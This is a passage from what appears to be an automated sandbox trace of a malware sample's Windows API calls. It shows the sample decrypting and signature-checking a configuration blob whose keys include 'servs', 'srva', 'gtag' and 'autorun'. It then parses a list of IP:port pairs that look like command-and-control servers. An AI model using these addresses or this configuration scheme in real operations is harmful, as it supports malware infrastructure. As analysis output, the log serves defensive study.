(HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47d80 [0119.419] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.419] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.419] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.419] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.419] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0119.419] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.419] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.420] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.420] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.420] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0119.420] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.420] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.420] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.421] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.421] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0119.421] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.421] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.421] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.421] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.421] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0119.421] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.421] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.421] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.422] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.422] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0119.422] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.422] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.422] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.423] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.423] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0119.423] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.423] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.423] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.423] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.423] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0119.423] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.423] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.430] CryptSetKeyParam (hKey=0x7281e0, dwParam=0x4, pbData=0xceb34*=0x1, dwFlags=0x0) returned 1 [0119.430] CryptSetKeyParam (hKey=0x7281e0, dwParam=0x1, pbData=0x32e47f90, dwFlags=0x0) returned 1 [0119.431] CryptDecrypt (in: hKey=0x7281e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32e41680, pdwDataLen=0xceb1c | out: pbData=0x32e41680, pdwDataLen=0xceb1c) returned 1 [0119.431] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.431] CryptDestroyKey (hKey=0x7281e0) returned 0 [0119.431] GetVersion () returned 0x295a000a [0119.436] BCryptImportKeyPair (in: hAlgorithm=0x728000, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0xcea80, pbInput=0x32e40d90, cbInput=0x68, dwFlags=0x0 | out: phKey=0xcea80) returned 0x0 [0119.438] BCryptGetProperty (in: hObject=0x721c80, pszProperty="SignatureLength", pbOutput=0xcea7c, cbOutput=0x4, pcbResult=0xcea9c, dwFlags=0x0 | out: pbOutput=0xcea7c, pcbResult=0xcea9c) returned 0x0 [0119.438] BCryptVerifySignature (hKey=0x721c80, pPaddingInfo=0x0, pbHash=0x32e40730, cbHash=0x30, pbSignature=0x32e41a84, cbSignature=0x60, dwFlags=0x0) returned 0x0 [0119.442] BCryptDestroyKey (in: hKey=0x721c80 | out: hKey=0x721c80) returned 0x0 [0119.442] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x728000, dwFlags=0x0 | out: hAlgorithm=0x728000) returned 0x0 [0119.442] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.443] CharLowerBuffA (in: lpsz="mcconf", cchLength=0x6 | out: lpsz="mcconf") returned 0x6 [0119.445] CharLowerBuffA (in: lpsz="ver", cchLength=0x3 | out: lpsz="ver") returned 0x3 [0119.446] CharLowerBuffA (in: lpsz="gtag", cchLength=0x4 | out: lpsz="gtag") returned 0x4 [0119.446] CharLowerBuffA (in: lpsz="servs", cchLength=0x5 | out: lpsz="servs") returned 0x5 [0119.447] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0119.447] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0119.447] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0119.447] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0119.447] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0119.447] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0119.447] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.447] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.448] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.448] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.448] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.448] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.448] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.448] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.448] CharLowerBuffA (in: lpsz="srva", cchLength=0x4 | out: lpsz="srva") returned 0x4 [0119.448] CharLowerBuffA (in: lpsz="autorun", cchLength=0x7 | out: lpsz="autorun") returned 0x7 [0119.448] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e41680, Size=0x400) returned 0x32e41680 [0119.448] CharLowerBuffA (in: lpsz="module", cchLength=0x6 | out: lpsz="module") returned 0x6 [0119.448] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4 [0119.448] CharLowerBuffA (in: lpsz="module", cchLength=0x6 | out: lpsz="module") returned 0x6 [0119.448] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4 [0119.448] StrStrIW (lpFirst="179.42.137.102:443", lpSrch=":") returned=":443" [0119.448] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0119.448] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e41af0, Size=0x10) returned 0x32e41af0 [0119.448] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40770 | out: hHeap=0x2150000) returned 1 [0119.448] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e498d0 | out: hHeap=0x2150000) returned 1 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41af0 | out: hHeap=0x2150000) returned 1 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.449] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47e70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0119.449] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47e70, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=19 | out: lpWideCharStr="191.36.152.198:443") returned 19 [0119.449] StrStrIW (lpFirst="191.36.152.198:443", lpSrch=":") returned=":443" [0119.449] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0119.449] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e41af0, Size=0x10) returned 0x32e41af0 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40770 | out: hHeap=0x2150000) returned 1 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ab0 | out: hHeap=0x2150000) returned 1 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41af0 | out: hHeap=0x2150000) returned 1 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.449] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48050, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0119.449] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48050, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=19 | out: lpWideCharStr="179.42.137.104:443") returned 19 [0119.449] StrStrIW (lpFirst="179.42.137.104:443", lpSrch=":") returned=":443" [0119.449] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0119.449] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e41af0, Size=0x10) returned 0x32e41af0 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40770 | out: hHeap=0x2150000) returned 1 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49600 | out: hHeap=0x2150000) returned 1 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41af0 | out: hHeap=0x2150000) returned 1 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.449] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48410, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0119.449] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48410, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=19 | out: lpWideCharStr="179.42.137.106:443") returned 19 [0119.449] StrStrIW (lpFirst="179.42.137.106:443", lpSrch=":") returned=":443" [0119.449] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0119.449] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e41af0, Size=0x10) returned 0x32e41af0 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40770 | out: hHeap=0x2150000) returned 1 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e499f0 | out: hHeap=0x2150000) returned 1 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41af0 | out: hHeap=0x2150000) returned 1 [0119.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.449] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48320, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0119.450] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48320, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=19 | out: lpWideCharStr="179.42.137.108:443") returned 19 [0119.450] StrStrIW (lpFirst="179.42.137.108:443", lpSrch=":") returned=":443" [0119.450] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0119.450] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e41af0, Size=0x10) returned 0x32e41af0 [0119.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40770 | out: hHeap=0x2150000) returned 1 [0119.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49570 | out: hHeap=0x2150000) returned 1 [0119.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41af0 | out: hHeap=0x2150000) returned 1 [0119.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.450] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47db0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0119.450] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47db0, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=19 | out: lpWideCharStr="202.183.12.124:443") returned 19 [0119.450] StrStrIW (lpFirst="202.183.12.124:443", lpSrch=":") returned=":443" [0119.450] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0119.450] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e41af0, Size=0x10) returned 0x32e41af0 [0119.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40770 | out: hHeap=0x2150000) returned 1 [0119.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e499f0 | out: hHeap=0x2150000) returned 1 [0119.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41af0 | out: hHeap=0x2150000) returned 1 [0119.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.450] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48440, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0119.450] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48440, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=19 | out: lpWideCharStr="194.190.18.122:443") returned 19 [0119.450] StrStrIW (lpFirst="194.190.18.122:443", lpSrch=":") returned=":443" [0119.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e41af0 [0119.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e499f0 [0119.450] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0119.450] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e41af0, Size=0x10) returned 0x32e41af0 [0119.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e40770 [0119.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e495a0 [0119.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40770 | out: hHeap=0x2150000) returned 1 [0119.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e499f0 | out: hHeap=0x2150000) returned 1 [0119.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41af0 | out: hHeap=0x2150000) returned 1 [0119.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.450] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48290, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.451] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48290, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=21 | out: lpWideCharStr="118.247.17.222:59356") returned 21 [0119.451] StrStrIW (lpFirst="118.247.17.222:59356", lpSrch=":") returned=":59356" [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e41af0 [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49c30 [0119.451] StrStrIW (lpFirst="59356", lpSrch=":") returned 0x0 [0119.451] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e41af0, Size=0x10) returned 0x32e41af0 [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e40770 [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49900 [0119.451] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49900 | out: hHeap=0x2150000) returned 1 [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49b40 [0119.451] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40770 | out: hHeap=0x2150000) returned 1 [0119.451] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49c30 | out: hHeap=0x2150000) returned 1 [0119.451] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41af0 | out: hHeap=0x2150000) returned 1 [0119.451] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.451] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48080, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.451] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48080, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=20 | out: lpWideCharStr="173.220.6.189:56170") returned 20 [0119.451] StrStrIW (lpFirst="173.220.6.189:56170", lpSrch=":") returned=":56170" [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e41af0 [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49570 [0119.451] StrStrIW (lpFirst="56170", lpSrch=":") returned 0x0 [0119.451] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e41af0, Size=0x10) returned 0x32e41af0 [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e40770 [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49c30 [0119.451] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49c30 | out: hHeap=0x2150000) returned 1 [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49cc0 [0119.451] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40770 | out: hHeap=0x2150000) returned 1 [0119.451] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49570 | out: hHeap=0x2150000) returned 1 [0119.451] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41af0 | out: hHeap=0x2150000) returned 1 [0119.451] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.451] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e484a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0119.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.452] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e484a0, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=19 | out: lpWideCharStr="7.218.172.17:30570") returned 19 [0119.452] StrStrIW (lpFirst="7.218.172.17:30570", lpSrch=":") returned=":30570" [0119.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e41af0 [0119.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e495d0 [0119.452] StrStrIW (lpFirst="30570", lpSrch=":") returned 0x0 [0119.452] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e41af0, Size=0x10) returned 0x32e41af0 [0119.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a020 [0119.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49c30 [0119.452] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49c30 | out: hHeap=0x2150000) returned 1 [0119.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49570 [0119.452] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4a020 | out: hHeap=0x2150000) returned 1 [0119.452] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e495d0 | out: hHeap=0x2150000) returned 1 [0119.452] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41af0 | out: hHeap=0x2150000) returned 1 [0119.452] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.452] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e482c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0119.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.452] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e482c0, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=22 | out: lpWideCharStr="158.228.140.227:27049") returned 22 [0119.452] StrStrIW (lpFirst="158.228.140.227:27049", lpSrch=":") returned=":27049" [0119.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a0a0 [0119.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e497e0 [0119.452] StrStrIW (lpFirst="27049", lpSrch=":") returned 0x0 [0119.452] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a0a0, Size=0x10) returned 0x32e49f00 [0119.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49f80 [0119.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e495d0 [0119.452] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e495d0 | out: hHeap=0x2150000) returned 1 [0119.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49870 [0119.452] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49f80 | out: hHeap=0x2150000) returned 1 [0119.452] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e497e0 | out: hHeap=0x2150000) returned 1 [0119.452] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49f00 | out: hHeap=0x2150000) returned 1 [0119.452] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.453] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48470, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0119.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.453] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48470, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=21 | out: lpWideCharStr="121.163.202.67:26632") returned 21 [0119.453] StrStrIW (lpFirst="121.163.202.67:26632", lpSrch=":") returned=":26632" [0119.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49f80 [0119.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49a20 [0119.453] StrStrIW (lpFirst="26632", lpSrch=":") returned 0x0 [0119.453] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49f80, Size=0x10) returned 0x32e49f60 [0119.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a000 [0119.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49b10 [0119.453] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49b10 | out: hHeap=0x2150000) returned 1 [0119.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49b70 [0119.453] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4a000 | out: hHeap=0x2150000) returned 1 [0119.453] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49a20 | out: hHeap=0x2150000) returned 1 [0119.453] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49f60 | out: hHeap=0x2150000) returned 1 [0119.453] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.453] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, 